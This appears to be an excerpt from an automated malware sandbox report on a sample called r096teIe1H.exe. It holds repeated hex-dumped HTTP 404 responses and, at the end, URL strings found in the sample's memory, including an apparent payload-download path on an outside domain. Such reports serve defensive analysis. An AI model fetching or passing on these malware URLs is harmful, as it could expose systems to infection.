Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:17:28 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:17:38 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:17:48 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:17:58 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:18:08 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:18:19 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:18:28 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;

Source: r096teIe1H.exe, 00000000.00000002.761075893.000000000019B000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://://t.exet.exe
Source: r096teIe1H.exe, 00000000.00000002.761124964.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, r096teIe1H.exe, 00000000.00000003.492188060.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://balkancelikdovme.com/
Source: r096teIe1H.exe, 00000000.00000002.761124964.00000000005E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://balkancelikdovme.com/LL
Source: r096teIe1H.exe, 00000000.00000002.762526795.000000000927B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk
Source: r096teIe1H.exe, 00000000.00000002.761124964.00000000005E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/XezdxpgykmkM
